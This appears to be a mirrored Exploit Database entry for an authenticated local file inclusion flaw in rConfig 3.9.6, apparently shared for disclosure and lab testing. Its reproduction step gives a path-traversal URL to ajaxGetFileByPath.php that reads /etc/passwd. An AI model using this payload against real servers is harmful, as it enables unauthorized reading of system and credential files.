rConfig 3.9.6 – ‘path’ Local File Inclusion (Authenticated)

• Exploit Database
• 19 阅读

• 作者： Murat ŞEKER
  日期： 2021-03-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49644/

• # Exploit Title: rConfig 3.9.6 - 'path' Local File Inclusion (Authenticated)
  # Date: 2021-03-12
  # Exploit Author: 5a65726f
  # Vendor Homepage: https://www.rconfig.com
  # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
  # Version: rConfig v3.9.6
  # Install scripts:
  # https://www.rconfig.com/downloads/scripts/install_rConfig.sh
  # https://www.rconfig.com/downloads/scripts/centos7_install.sh
  # https://www.rconfig.com/downloads/scripts/centos6_install.sh
  # Tested on: centOS 7
  # Notes : If you want to reproduce in your lab environment follow those links :
  # http://help.rconfig.com/gettingstarted/installation
  # then
  # http://help.rconfig.com/gettingstarted/postinstall
  
  # Description:
  rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/ajaxHandlers/ajaxGetFileByPath.php with parameter path.ajaxGetFileByPath.php allows authenticated users to download any file on the server.
  
  The following steps can be carried out in duplicating this vulnerability.
  
  - Login the rConfig application with your credentials.
  - Enter the following link to your browser: 
  http(s)://<SERVER>/lib/ajaxHandlers/ajaxGetFileByPath.php?path=../../../../../../etc/passwd